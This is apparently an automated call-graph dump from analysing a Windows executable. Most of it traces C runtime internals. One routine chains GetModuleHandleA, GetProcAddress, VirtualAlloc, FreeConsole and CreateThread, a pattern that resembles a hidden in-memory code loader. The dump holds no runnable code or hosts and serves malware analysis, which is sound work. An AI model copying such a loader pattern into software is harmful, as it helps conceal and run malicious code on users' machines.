6f563c GetLastError 15986->15989 15992 6f5567 15986->15992 15987 6f55c1 15993 6f557b 15987->15993 15994 6f5dab __fread_nolock 46 API calls 15987->15994 15988 6f55b1 15990 6ec900 __strnicoll 14 API calls 15988->15990 15991 6ec8a6 __dosmaperr 14 API calls 15989->15991 15990->15992 15991->15992 15992->15963 16026 6f7a26 15993->16026 15994->15993 15996 6f53ae 15995->15996 15997 6f5443 ReadFile 15996->15997 15998 6f543e 15996->15998 15997->15998 15999 6f5460 15997->15999 15998->15963 15999->15998 16000 6f5dab __fread_nolock 46 API calls 15999->16000 16000->15998 16007 6f94a1 16001->16007 16003 6f5cdc 16004 6f5cf8 SetFilePointerEx 16003->16004 16006 6f5ce4 __fread_nolock 16003->16006 16005 6f5d10 GetLastError 16004->16005 16004->16006 16005->16006 16006->15974 16008 6f94ae 16007->16008 16009 6f94c3 16007->16009 16010 6ec8ed __dosmaperr 14 API calls 16008->16010 16011 6ec8ed __dosmaperr 14 API calls 16009->16011 16013 6f94e8 16009->16013 16012 6f94b3 16010->16012 16014 6f94f3 16011->16014 16015 6ec900 __strnicoll 14 API calls 16012->16015 16013->16003 16016 6ec900 __strnicoll 14 API calls 16014->16016 16017 6f94bb 16015->16017 16018 6f94fb 16016->16018 16017->16003 16019 6ec802 __strnicoll 44 API calls 16018->16019 16019->16017 16021 6f525f 16020->16021 16022 6f52ce ReadFile 16021->16022 16023 6f52c9 16021->16023 16022->16023 16024 6f52e7 16022->16024 16023->15987 16023->15988 16023->15992 16023->15993 16024->16023 16025 6f5dab __fread_nolock 46 API calls 16024->16025 16025->16023 16027 6f7a37 MultiByteToWideChar 16026->16027 16027->15986 16029->15970 17391 6e5858 17394 6e5771 17391->17394 17393 6e5863 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 17395 6e57a2 17394->17395 17396 6e57b4 17395->17396 17398 6e5a9b 17395->17398 17396->17393 17399 6e5aa5 17398->17399 17403 6e5ac3 17398->17403 17404 6e58e4 17399->17404 17403->17396 17407 6e58ff 17404->17407 17409 6e5950 17404->17409 17405 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17406 6e5968 17405->17406 17410 6eccc5 17406->17410 17408 6edcd3 72 API calls 17407->17408 17407->17409 17408->17409 17409->17405 17411 6eccd8 _Fputc 17410->17411 17416 6ecba0 17411->17416 17413 6ecce4 17414 6ec320 _Fputc 44 API calls 17413->17414 17415 6eccf0 17414->17415 17415->17403 17417 6ecbac __FrameHandler3::FrameUnwindToState 17416->17417 17418 6ecbd9 17417->17418 17419 6ecbb6 17417->17419 17421 6ecbd1 17418->17421 17427 6ecb78 EnterCriticalSection 17418->17427 17420 6ec785 __strnicoll 44 API calls 17419->17420 17420->17421 17421->17413 17423 6ecbf7 17428 6ecc37 17423->17428 17425 6ecc04 17442 6ecc2f 17425->17442 17427->17423 17429 6ecc67 17428->17429 17430 6ecc44 17428->17430 17432 6ecf32 ___scrt_uninitialize_crt 69 API calls 17429->17432 17441 6ecc5f 17429->17441 17431 6ec785 __strnicoll 44 API calls 17430->17431 17431->17441 17433 6ecc7f 17432->17433 17445 6f341d 17433->17445 17436 6f364f _Ungetc 44 API calls 17437 6ecc93 17436->17437 17449 6f3707 17437->17449 17440 6f1f6f ___free_lconv_mon 14 API calls 17440->17441 17441->17425 17491 6ecb8c LeaveCriticalSection 17442->17491 17444 6ecc35 17444->17421 17446 6ecc87 17445->17446 17447 6f3434 17445->17447 17446->17436 17447->17446 17448 6f1f6f ___free_lconv_mon 14 API calls 17447->17448 17448->17446 17452 6f3730 17449->17452 17455 6ecc9a 17449->17455 17450 6f377f 17451 6ec785 __strnicoll 44 API calls 17450->17451 17451->17455 17452->17450 17453 6f3757 17452->17453 17456 6f3676 17453->17456 17455->17440 17455->17441 17457 6f3682 __FrameHandler3::FrameUnwindToState 17456->17457 17464 6f93ca EnterCriticalSection 17457->17464 17459 6f3690 17460 6f36c1 17459->17460 17465 6f37aa 17459->17465 17478 6f36fb 17460->17478 17464->17459 17466 6f94a1 __fread_nolock 44 API calls 17465->17466 17468 6f37ba 17466->17468 17467 6f37c0 17481 6f9410 17467->17481 17468->17467 17470 6f37f2 17468->17470 17471 6f94a1 __fread_nolock 44 API calls 17468->17471 17470->17467 17472 6f94a1 __fread_nolock 44 API calls 17470->17472 17473 6f37e9 17471->17473 17474 6f37fe CloseHandle 17472->17474 17475 6f94a1 __fread_nolock 44 API calls 17473->17475 17474->17467 17476 6f380a GetLastError 17474->17476 17475->17470 17476->17467 17477 6f3818 __fread_nolock 17477->17460 17490 6f93ed LeaveCriticalSection 17478->17490 17480 6f36e4 17480->17455 17482 6f941f 17481->17482 17483 6f9486 17481->17483 17482->17483 17487 6f9449 17482->17487 17484 6ec900 __strnicoll 14 API calls 17483->17484 17485 6f948b 17484->17485 17486 6ec8ed __dosmaperr 14 API calls 17485->17486 17488 6f9476 17486->17488 17487->17488 17489 6f9470 SetStdHandle 17487->17489 17488->17477 17489->17488 17490->17480 17491->17444 17497 6e6029 17498 6e604b 17497->17498 17502 6e6060 17497->17502 17499 6e58e4 72 API calls 17498->17499 17500 6e6050 17499->17500 17500->17502 17503 6ed6bb 17500->17503 17504 6ed6db 17503->17504 17505 6ed6c6 17503->17505 17504->17505 17507 6ed6e2 17504->17507 17506 6ec900 __strnicoll 14 API calls 17505->17506 17508 6ed6cb 17506->17508 17513 6ed9d1 17507->17513 17510 6ec802 __strnicoll 44 API calls 17508->17510 17512 6ed6d6 17510->17512 17512->17502 17514 6ed9e4 _Fputc 17513->17514 17519 6ed770 17514->17519 17517 6ec320 _Fputc 44 API calls 17518 6ed6f1 17517->17518 17518->17502 17522 6ed77c __FrameHandler3::FrameUnwindToState 17519->17522 17520 6ed782 17521 6ec785 __strnicoll 44 API calls 17520->17521 17529 6ed79d 17521->17529 17522->17520 17523 6ed7b6 17522->17523 17530 6ecb78 EnterCriticalSection 17523->17530 17525 6ed7c2 17531 6ed8e5 17525->17531 17527 6ed7d9 17540 6ed802 17527->17540 17529->17517 17530->17525 17532 6ed90b 17531->17532 17533 6ed8f8 17531->17533 17543 6ed80c 17532->17543 17533->17527 17535 6ed92e 17536 6ecf32 ___scrt_uninitialize_crt 69 API calls 17535->17536 17539 6ed9bc 17535->17539 17537 6ed95c 17536->17537 17547 6f5deb 17537->17547 17539->17527 17550 6ecb8c LeaveCriticalSection 17540->17550 17542 6ed80a 17542->17529 17544 6ed81d 17543->17544 17546 6ed875 17543->17546 17545 6f5dab __fread_nolock 46 API calls 17544->17545 17544->17546 17545->17546 17546->17535 17548 6f5cca __fread_nolock 46 API calls 17547->17548 17549 6f5e04 17548->17549 17549->17539 17550->17542 20073 6fa60f 20074 6fa628 20073->20074 20077 6f29f4 20074->20077 20078 6f26c0 std::_Lockit::_Lockit 5 API calls 20077->20078 20079 6f2a02 20078->20079 20081 6f2a08 20079->20081 20082 6f25e1 20079->20082 20083 6f25ed __FrameHandler3::FrameUnwindToState 20082->20083 20089 6ec954 EnterCriticalSection 20083->20089 20085 6f25fb __FrameHandler3::FrameUnwindToState 20086 6f260c EnumSystemLocalesW 20085->20086 20090 6f2651 20086->20090 20089->20085 20093 6ec99c LeaveCriticalSection 20090->20093 20092 6f263a 20092->20081 20093->20092 17650 6ed009 17651 6ed01b 17650->17651 17652 6ed024 ___scrt_uninitialize_crt 17650->17652 17653 6ece8d ___scrt_uninitialize_crt 73 API calls 17651->17653 17655 6ed035 17652->17655 17658 6ece2d 17652->17658 17654 6ed021 17653->17654 17659 6ece39 __FrameHandler3::FrameUnwindToState 17658->17659 17666 6ecb78 EnterCriticalSection 17659->17666 17661 6ece47 17662 6ecf9b ___scrt_uninitialize_crt 73 API calls 17661->17662 17663 6ece58 17662->17663 17667 6ece81 17663->17667 17666->17661 17670 6ecb8c LeaveCriticalSection 17667->17670 17669 6ece6a 17670->17669 17679 6e481c 17680 6e482f 17679->17680 17682 6e4843 17680->17682 17683 6ee004 17680->17683 17684 6ee010 __FrameHandler3::FrameUnwindToState 17683->17684 17685 6ee02c 17684->17685 17686 6ee017 17684->17686 17696 6ecb78 EnterCriticalSection 17685->17696 17688 6ec900 __strnicoll 14 API calls 17686->17688 17690 6ee01c 17688->17690 17689 6ee036 17697 6edf0b 17689->17697 17692 6ec802 __strnicoll 44 API calls 17690->17692 17694 6ee027 17692->17694 17694->17682 17696->17689 17698 6edf23 17697->17698 17705 6edf93 17697->17705 17699 6f364f _Ungetc 44 API calls 17698->17699 17703 6edf29 17699->17703 17700 6edf8b 17708 6ee06f 17700->17708 17701 6f5f2e _Ungetc 14 API calls 17701->17700 17702 6edf7b 17704 6ec900 __strnicoll 14 API calls 17702->17704 17703->17702 17703->17705 17706 6edf80 17704->17706 17705->17700 17705->17701 17707 6ec802 __strnicoll 44 API calls 17706->17707 17707->17700 17711 6ecb8c LeaveCriticalSection 17708->17711 17710 6ee075 17710->17694 17711->17710 20252 6ecae6 20253 6ed000 ___scrt_uninitialize_crt 73 API calls 20252->20253 20254 6ecaee 20253->20254 20262 6f3372 20254->20262 20256 6ecaf3 20257 6f341d 14 API calls 20256->20257 20258 6ecb02 DeleteCriticalSection 20257->20258 20258->20256 20259 6ecb1d 20258->20259 20260 6f1f6f ___free_lconv_mon 14 API calls 20259->20260 20261 6ecb28 20260->20261 20263 6f337e __FrameHandler3::FrameUnwindToState 20262->20263 20272 6ec954 EnterCriticalSection 20263->20272 20265 6f33f5 20273 6f3414 20265->20273 20267 6f3389 20267->20265 20269 6f33c9 DeleteCriticalSection 20267->20269 20270 6eccc5 74 API calls 20267->20270 20271 6f1f6f ___free_lconv_mon 14 API calls 20269->20271 20270->20267 20271->20267 20272->20267 20276 6ec99c LeaveCriticalSection 20273->20276 20275 6f3401 20275->20256 20276->20275 20489 6e5edc 20490 6e5ef6 20489->20490 20491 6e5f08 20490->20491 20493 6e5543 20490->20493 20496 6ee964 20493->20496 20497 6ee970 __FrameHandler3::FrameUnwindToState 20496->20497 20498 6ee98e 20497->20498 20499 6ee977 20497->20499 20509 6ecb78 EnterCriticalSection 20498->20509 20500 6ec900 __strnicoll 14 API calls 20499->20500 20502 6ee97c 20500->20502 20504 6ec802 __strnicoll 44 API calls 20502->20504 20503 6ee99d 20510 6ee8ae 20503->20510 20508 6e5555 20504->20508 20506 6ee9ab 20522 6ee9da 20506->20522 20508->20491 20509->20503 20511 6ee927 _Ungetc 20510->20511 20512 6ee8c4 20510->20512 20511->20506 20512->20511 20513 6f5f2e _Ungetc 14 API calls 20512->20513 20514 6ee8f2 20512->20514 20513->20514 20514->20511 20515 6f364f _Ungetc 44 API calls 20514->20515 20516 6ee904 20515->20516 20516->20511 20517 6f364f _Ungetc 44 API calls 20516->20517 20518 6ee910 20517->20518 20518->20511 20519 6f364f _Ungetc 44 API calls 20518->20519 20520 6ee91c 20519->20520 20521 6f364f _Ungetc 44 API calls 20520->20521 20521->20511 20525 6ecb8c LeaveCriticalSection 20522->20525 20524 6ee9e0 20524->20508 20525->20524 15175 6e38da 15181 6e21ef 15175->15181 15197 6e1ddc 15175->15197 15176 6e38e1 15213 6e68ff GetCurrentThreadId 15176->15213 15178 6e38e6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15221 6e2493 15181->15221 15185 6e221b 15238 6e2011 15185->15238 15187 6e2228 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15188 6e2230 GetModuleHandleA GetProcAddress VirtualAlloc FreeConsole 15187->15188 15249 6e1d3c 15188->15249 15190 6e226c ctype 15191 6e1ddc 73 API calls 15190->15191 15192 6e227e CreateThread WaitForSingleObject 15191->15192 15255 6e2520 15192->15255 15196 6e22b6 15196->15176 15198 6e7031 codecvt 45 API calls 15197->15198 15199 6e1e00 std::_Throw_Cpp_error 15198->15199 15200 6e2493 45 API calls std::_Throw_Cpp_error 15199->15200 15202 6e200b 15199->15202 15204 6e2520 44 API calls std::_Throw_Cpp_error 15199->15204 15205 6e7031 codecvt 45 API calls 15199->15205 15208 6e1fe9 15199->15208 15572 6e33a0 15199->15572 15585 6e372b 15199->15585 15200->15199 15589 6e1d31 15202->15589 15204->15199 15205->15199 15582 6e244f 15208->15582 15210 6e1ff2 15211 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15210->15211 15212 6e2004 15211->15212 15212->15176 15832 6e3b4e 15213->15832 15215 6e697c 15839 6e3b5a 15215->15839 15218 6e6918 15218->15215 15835 6e6fa7 15218->15835 15838 6e6fc5 WakeAllConditionVariable 15218->15838 15222 6e24b0 std::_Throw_Cpp_error 15221->15222 15266 6e2b05 15222->15266 15224 6e2214 15225 6e7031 15224->15225 15226 6e7036 ___std_exception_copy 15225->15226 15227 6e7050 15226->15227 15229 6e7052 15226->15229 15520 6ef569 15226->15520 15227->15185 15230 6e12bf Concurrency::cancel_current_task 15229->15230 15231 6e705c codecvt 15229->15231 15232 6e8413 CallUnexpected RaiseException 15230->15232 15234 6e8413 CallUnexpected RaiseException 15231->15234 15233 6e12db 15232->15233 15235 6e1235 Concurrency::cancel_current_task 44 API calls 15233->15235 15236 6e7a2e 15234->15236 15237 6e12e8 15235->15237 15237->15185 15239 6e210b 15238->15239 15247 6e2042 15238->15247 15534 6e2429 15239->15534 15242 6e2493 45 API calls std::_Throw_Cpp_error 15242->15247 15243 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15244 6e2125 15243->15244 15244->15187 15245 6e2546 45 API calls 15245->15247 15246 6ec59e 47 API calls 15246->15247 15247->15239 15247->15242 15247->15245 15247->15246 15248 6e2520 44 API calls std::_Throw_Cpp_error 15247->15248 15248->15247 15250 6e1d58 15249->15250 15251 6e1dc5 15250->15251 15549 6e35ea 15250->15549 15253 6e1dd8 15251->15253 15254 6e2d2c _Deallocate 44 API calls 15251->15254 15253->15190 15254->15253 15256 6e252b 15255->15256 15257 6e22a8 15255->15257 15258 6e2d2c _Deallocate 44 API calls 15256->15258 15259 6e701e 15257->15259 15258->15257 15260 6e7026 15259->15260 15261 6e7027 IsProcessorFeaturePresent 15259->15261 15260->15196 15263 6e784d 15261->15263 15571 6e7810 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15263->15571 15265 6e7930 15265->15196 15267 6e2b70 15266->15267 15270 6e2b16 std::_Throw_Cpp_error 15266->15270 15281 6e132e 15267->15281 15272 6e2b1d std::_Throw_Cpp_error 15270->15272 15273 6e3709 15270->15273 15272->15224 15274 6e371c 15273->15274 15275 6e3714 15273->15275 15277 6e3728 15274->15277 15279 6e7031 codecvt 45 API calls 15274->15279 15284 6e38f6 15275->15284 15277->15272 15278 6e371a 15278->15272 15280 6e3726 15279->15280 15280->15272 15509 6e3d97 15281->15509 15285 6e3905 15284->15285 15287 6e12bf Concurrency::cancel_current_task 15284->15287 15286 6e7031 codecvt 45 API calls 15285->15286 15288 6e390b 15286->15288 15298 6e8413 15287->15298 15289 6e3912 15288->15289 15304 6ec74e 15288->15304 15289->15278 15291 6e12db 15301 6e1235 15291->15301 15297 6ec82e 15299 6e845a RaiseException 15298->15299 15300 6e842d 15298->15300 15299->15291 15300->15299 15314 6e7deb 15301->15314 15305 6ec760 _Fputc 15304->15305 15367 6ec785 15305->15367 15307 6ec778 15378 6ec320 15307->15378 15310 6ec82f IsProcessorFeaturePresent 15311 6ec83b 15310->15311 15312 6ec606 __InternalCxxFrameHandler 8 API calls 15311->15312 15313 6ec850 GetCurrentProcess TerminateProcess 15312->15313 15313->15297 15315 6e7df8 ___std_exception_copy 15314->15315 15318 6e1256 15314->15318 15315->15318 15319 6e7e25 15315->15319 15320 6f1e05 15315->15320 15318->15278 15329 6eba1b 15319->15329 15321 6f1e21 15320->15321 15322 6f1e13 15320->15322 15332 6ec900 15321->15332 15322->15321 15327 6f1e39 15322->15327 15324 6f1e29 15335 6ec802 15324->15335 15326 6f1e33 15326->15319 15327->15326 15328 6ec900 __strnicoll 14 API calls 15327->15328 15328->15324 15361 6f1f6f 15329->15361 15338 6f243a GetLastError 15332->15338 15334 6ec905 15334->15324 15336 6ec74e __strnicoll 44 API calls 15335->15336 15337 6ec80e 15336->15337 15337->15326 15339 6f2456 15338->15339 15340 6f2450 15338->15340 15342 6f2b05 __Getctype 6 API calls 15339->15342 15344 6f245a SetLastError 15339->15344 15341 6f2ac6 __Getctype 6 API calls 15340->15341 15341->15339 15343 6f2472 15342->15343 15343->15344 15346 6f1f12 __InternalCxxFrameHandler 12 API calls 15343->15346 15344->15334 15347 6f2487 15346->15347 15348 6f248f 15347->15348 15349 6f24a0 15347->15349 15350 6f2b05 __Getctype 6 API calls 15348->15350 15351 6f2b05 __Getctype 6 API calls 15349->15351 15352 6f249d 15350->15352 15353 6f24ac 15351->15353 15358 6f1f6f ___free_lconv_mon 12 API calls 15352->15358 15354 6f24c7 15353->15354 15355 6f24b0 15353->15355 15356 6f2117 __Getctype 12 API calls 15354->15356 15357 6f2b05 __Getctype 6 API calls 15355->15357 15359 6f24d2 15356->15359 15357->15352 15358->15344 15360 6f1f6f ___free_lconv_mon 12 API calls 15359->15360 15360->15344 15362 6f1f7a HeapFree 15361->15362 15366 6eba33 15361->15366 15363 6f1f8f GetLastError 15362->15363 15362->15366 15364 6f1f9c __dosmaperr 15363->15364 15365 6ec900 __strnicoll 12 API calls 15364->15365 15365->15366 15366->15318 15368 6ec795 15367->15368 15369 6ec79c 15367->15369 15384 6ec360 GetLastError 15368->15384 15375 6ec7aa 15369->15375 15388 6ec5dd 15369->15388 15372 6ec7d1 15373 6ec82f __Getctype 11 API calls 15372->15373 15372->15375 15374 6ec801 15373->15374 15376 6ec74e __strnicoll 44 API calls 15374->15376 15375->15307 15377 6ec80e 15376->15377 15377->15307 15379 6ec32c 15378->15379 15380 6ec343 15379->15380 15435 6ec3b0 15379->15435 15382 6ec356 15380->15382 15383 6ec3b0 _Fputc 44 API calls 15380->15383 15382->15310 15383->15382 15385 6ec379 15384->15385 15391 6f24eb 15385->15391 15389 6ec5e8 GetLastError SetLastError 15388->15389 15390 6ec601 15388->15390 15389->15372 15390->15372 15392 6f24fe 15391->15392 15393 6f2504 15391->15393 15413 6f2ac6 15392->15413 15412 6ec395 SetLastError 15393->15412 15418 6f2b05 15393->15418 15399 6f254b 15402 6f2b05 __Getctype 6 API calls 15399->15402 15400 6f2536 15401 6f2b05 __Getctype 6 API calls 15400->15401 15404 6f2542 15401->15404 15403 6f2557 15402->15403 15405 6f255b 15403->15405 15406 6f256a 15403->15406 15408 6f1f6f ___free_lconv_mon 14 API calls 15404->15408 15409 6f2b05 __Getctype 6 API calls 15405->15409 15430 6f2117 15406->15430 15408->15412 15409->15404 15411 6f1f6f ___free_lconv_mon 14 API calls 15411->15412 15412->15369 15414 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 15413->15414 15415 6f2ae2 15414->15415 15416 6f2afd TlsGetValue 15415->15416 15417 6f2aeb 15415->15417 15417->15393 15419 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 15418->15419 15420 6f2b21 15419->15420 15421 6f2b3f TlsSetValue 15420->15421 15422 6f251e 15420->15422 15422->15412 15423 6f1f12 15422->15423 15429 6f1f1f __InternalCxxFrameHandler 15423->15429 15424 6f1f5f 15426 6ec900 __strnicoll 13 API calls 15424->15426 15425 6f1f4a RtlAllocateHeap 15427 6f1f5d 15425->15427 15425->15429 15426->15427 15427->15399 15427->15400 15428 6ef569 codecvt EnterCriticalSection LeaveCriticalSection 15428->15429 15429->15424 15429->15425 15429->15428 15431 6f1fa9 __Getctype EnterCriticalSection LeaveCriticalSection 15430->15431 15432 6f2185 15431->15432 15433 6f20bd __Getctype 14 API calls 15432->15433 15434 6f21ae 15433->15434 15434->15411 15436 6ec3be GetLastError 15435->15436 15437 6ec3ff 15435->15437 15438 6ec3cd 15436->15438 15437->15380 15439 6f24eb _Fputc 14 API calls 15438->15439 15440 6ec3ea SetLastError 15439->15440 15440->15437 15441 6ec406 15440->15441 15444 6ec9ca 15441->15444 15465 6f313a 15444->15465 15447 6ec9da 15449 6eca03 15447->15449 15450 6ec9e4 IsProcessorFeaturePresent 15447->15450 15501 6f0111 15449->15501 15452 6ec9f0 15450->15452 15495 6ec606 15452->15495 15455 6f1f12 __InternalCxxFrameHandler 14 API calls 15456 6eca35 15455->15456 15457 6f1f6f ___free_lconv_mon 14 API calls 15456->15457 15458 6eca41 15457->15458 15459 6f1f12 __InternalCxxFrameHandler 14 API calls 15458->15459 15463 6eca67 15458->15463 15460 6eca5b 15459->15460 15462 6f1f6f ___free_lconv_mon 14 API calls 15460->15462 15462->15463 15464 6ec40b 15463->15464 15504 6f2bc2 15463->15504 15466 6f306c __InternalCxxFrameHandler EnterCriticalSection LeaveCriticalSection 15465->15466 15467 6ec9cf 15466->15467 15467->15447 15468 6f317f 15467->15468 15470 6f318b __FrameHandler3::FrameUnwindToState 15468->15470 15469 6f31b2 __InternalCxxFrameHandler 15472 6f31ff 15469->15472 15474 6f31b8 __InternalCxxFrameHandler 15469->15474 15494 6f31e9 15469->15494 15470->15469 15471 6f243a __dosmaperr 14 API calls 15470->15471 15470->15474 15471->15469 15473 6ec900 __strnicoll 14 API calls 15472->15473 15475 6f3204 15473->15475 15477 6f322b 15474->15477 15478 6ec954 std::_Lockit::_Lockit EnterCriticalSection 15474->15478 15476 6ec802 __strnicoll 44 API calls 15475->15476 15476->15494 15480 6f335e 15477->15480 15481 6f326d 15477->15481 15491 6f329c 15477->15491 15478->15477 15479 6f330b __InternalCxxFrameHandler LeaveCriticalSection 15483 6f32e2 15479->15483 15482 6f3369 15480->15482 15484 6ec99c std::_Lockit::~_Lockit LeaveCriticalSection 15480->15484 15486 6f22e9 __Getctype 44 API calls 15481->15486 15481->15491 15485 6f0111 __InternalCxxFrameHandler 23 API calls 15482->15485 15488 6f22e9 __Getctype 44 API calls 15483->15488 15492 6f32f1 15483->15492 15483->15494 15484->15482 15487 6f3371 15485->15487 15489 6f3291 15486->15489 15488->15492 15490 6f22e9 __Getctype 44 API calls 15489->15490 15490->15491 15491->15479 15493 6f22e9 __Getctype 44 API calls 15492->15493 15492->15494 15493->15494 15494->15447 15496 6ec622 __InternalCxxFrameHandler __fread_nolock 15495->15496 15497 6ec64e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15496->15497 15499 6ec71f __InternalCxxFrameHandler 15497->15499 15498 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15500 6ec73d 15498->15500 15499->15498 15500->15449 15502 6eff35 __InternalCxxFrameHandler 23 API calls 15501->15502 15503 6eca0d 15502->15503 15503->15455 15505 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 15504->15505 15506 6f2bde 15505->15506 15507 6f2bfc InitializeCriticalSectionAndSpinCount 15506->15507 15508 6f2be7 15506->15508 15507->15508 15508->15463 15514 6e3cd7 15509->15514 15512 6e8413 CallUnexpected RaiseException 15513 6e3db6 15512->15513 15517 6e1200 15514->15517 15518 6e7deb ___std_exception_copy 44 API calls 15517->15518 15519 6e122c 15518->15519 15519->15512 15523 6ef596 15520->15523 15524 6ef5a2 __FrameHandler3::FrameUnwindToState 15523->15524 15529 6ec954 EnterCriticalSection 15524->15529 15526 6ef5ad 15530 6ef5e9 15526->15530 15529->15526 15533 6ec99c LeaveCriticalSection 15530->15533 15532 6ef574 15532->15226 15533->15532 15535 6e2114 15534->15535 15536 6e2431 15534->15536 15535->15243 15538 6e2d2c 15536->15538 15539 6e2d46 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15538->15539 15540 6e2d39 15538->15540 15539->15535 15542 6e130c 15540->15542 15543 6e1329 15542->15543 15544 6e1326 15542->15544 15545 6ec74e __strnicoll 44 API calls 15543->15545 15544->15539 15546 6ec821 15545->15546 15547 6ec82f __Getctype 11 API calls 15546->15547 15548 6ec82e 15547->15548 15550 6e35f6 __EH_prolog3_catch 15549->15550 15551 6e36f9 15550->15551 15552 6e3613 15550->15552 15562 6e384b 15551->15562 15554 6e3630 15552->15554 15555 6e36fe 15552->15555 15556 6e3709 std::_Throw_Cpp_error 45 API calls 15554->15556 15565 6e12bf 15555->15565 15559 6e3646 ctype 15556->15559 15560 6e2d2c _Deallocate 44 API calls 15559->15560 15561 6e36c5 codecvt 15559->15561 15560->15561 15561->15250 15563 6e3d97 std::_Xinvalid_argument 45 API calls 15562->15563 15564 6e3855 15563->15564 15566 6e12cd Concurrency::cancel_current_task 15565->15566 15567 6e8413 CallUnexpected RaiseException 15566->15567 15568 6e12db 15567->15568 15569 6e1235 Concurrency::cancel_current_task 44 API calls 15568->15569 15570 6e12e8 15569->15570 15571->15265 15573 6e33ac __EH_prolog3_catch 15572->15573 15596 6e3074 15573->15596 15575 6e33f5 15580 6e33fa 15575->15580 15600 6e4eb0 15575->15600 15577 6e351c 15613 6e2de0 15577->15613 15579 6e3524 codecvt 15579->15199 15604 6e1caf 15580->15604 15827 6e35ab 15582->15827 15584 6e245d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15584->15210 15586 6e373d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15585->15586 15587 6e3735 15585->15587 15586->15199 15588 6e2520 std::_Throw_Cpp_error 44 API calls 15587->15588 15588->15586 15590 6e3d97 std::_Xinvalid_argument 45 API calls 15589->15590 15591 6e1d3b 15590->15591 15592 6e35ea 45 API calls 15591->15592 15593 6e1dc5 15591->15593 15592->15591 15594 6e1dd8 15593->15594 15595 6e2d2c _Deallocate 44 API calls 15593->15595 15595->15594 15598 6e308c 15596->15598 15597 6e30af 15597->15575 15598->15597 15617 6e2e67 15598->15617 15601 6e4ed2 ctype 15600->15601 15603 6e4ebf 15600->15603 15601->15603 15625 6edcd3 15601->15625 15603->15580 15605 6e1d0a 15604->15605 15607 6e1cc6 std::ios_base::_Init 15604->15607 15605->15577 15606 6e8413 CallUnexpected RaiseException 15608 6e1d18 15606->15608 15612 6e1cff 15607->15612 15757 6e1c86 15607->15757 15760 6e157e 15608->15760 15612->15606 15614 6e2de8 15613->15614 15615 6e2df3 15614->15615 15823 6e3338 15614->15823 15615->15579 15618 6e2e73 __EH_prolog3_catch 15617->15618 15619 6e2f18 codecvt 15618->15619 15620 6e3074 45 API calls 15618->15620 15619->15597 15623 6e2e92 15620->15623 15621 6e2f10 15622 6e2de0 45 API calls 15621->15622 15622->15619 15623->15621 15624 6e1caf std::ios_base::_Init 45 API calls 15623->15624 15624->15621 15626 6edce6 _Fputc 15625->15626 15631 6edab2 15626->15631 15628 6edcfb 15629 6ec320 _Fputc 44 API calls 15628->15629 15630 6edd08 15629->15630 15630->15603 15632 6edac0 15631->15632 15637 6edae8 15631->15637 15633 6edaef 15632->15633 15634 6edacd 15632->15634 15632->15637 15639 6eda0b 15633->15639 15635 6ec785 __strnicoll 44 API calls 15634->15635 15635->15637 15637->15628 15640 6eda17 __FrameHandler3::FrameUnwindToState 15639->15640 15647 6ecb78 EnterCriticalSection 15640->15647 15642 6eda25 15648 6eda66 15642->15648 15647->15642 15658 6f5e44 15648->15658 15655 6eda5a 15756 6ecb8c LeaveCriticalSection 15655->15756 15657 6eda43 15657->15628 15678 6f5e09 15658->15678 15660 6eda7e 15665 6edb29 15660->15665 15661 6f5e55 15661->15660 15684 6f5f8a 15661->15684 15664 6f1f6f ___free_lconv_mon 14 API calls 15664->15660 15667 6edb3b 15665->15667 15669 6eda9c 15665->15669 15666 6edb49 15668 6ec785 __strnicoll 44 API calls 15666->15668 15667->15666 15667->15669 15672 6edb7f ctype _Fputc 15667->15672 15668->15669 15674 6f5ef0 15669->15674 15671 6f364f _Ungetc 44 API calls 15671->15672 15672->15669 15672->15671 15707 6ecf32 15672->15707 15713 6f4152 15672->15713 15675 6eda32 15674->15675 15676 6f5efb 15674->15676 15675->15655 15676->15675 15677 6ecf32 ___scrt_uninitialize_crt 69 API calls 15676->15677 15677->15675 15680 6f5e15 15678->15680 15679 6f5e36 15679->15661 15680->15679 15691 6f364f 15680->15691 15682 6f5e30 15698 6fbe7c 15682->15698 15685 6f5fc8 15684->15685 15690 6f5f98 __InternalCxxFrameHandler 15684->15690 15687 6ec900 __strnicoll 14 API calls 15685->15687 15686 6f5fb3 RtlAllocateHeap 15688 6f5eaf 15686->15688 15686->15690 15687->15688 15688->15664 15689 6ef569 codecvt 2 API calls 15689->15690 15690->15685 15690->15686 15690->15689 15692 6f365b 15691->15692 15693 6f3670 15691->15693 15694 6ec900 __strnicoll 14 API calls 15692->15694 15693->15682 15695 6f3660 15694->15695 15696 6ec802 __strnicoll 44 API calls 15695->15696 15697 6f366b 15696->15697 15697->15682 15699 6fbe89 15698->15699 15700 6fbe96 15698->15700 15701 6ec900 __strnicoll 14 API calls 15699->15701 15702 6fbea2 15700->15702 15703 6ec900 __strnicoll 14 API calls 15700->15703 15704 6fbe8e 15701->15704 15702->15679 15705 6fbec3 15703->15705 15704->15679 15706 6ec802 __strnicoll 44 API calls 15705->15706 15706->15704 15708 6ecf4b 15707->15708 15712 6ecf72 15707->15712 15709 6f364f _Ungetc 44 API calls 15708->15709 15708->15712 15710 6ecf67 15709->15710 15711 6f4152 ___scrt_uninitialize_crt 69 API calls 15710->15711 15711->15712 15712->15672 15714 6f415e __FrameHandler3::FrameUnwindToState 15713->15714 15715 6f4222 15714->15715 15717 6f41b3 15714->15717 15723 6f4166 15714->15723 15716 6ec785 __strnicoll 44 API calls 15715->15716 15716->15723 15724 6f93ca EnterCriticalSection 15717->15724 15719 6f41b9 15720 6f41d6 15719->15720 15725 6f425a 15719->15725 15753 6f421a 15720->15753 15723->15672 15724->15719 15726 6f427f 15725->15726 15749 6f42a2 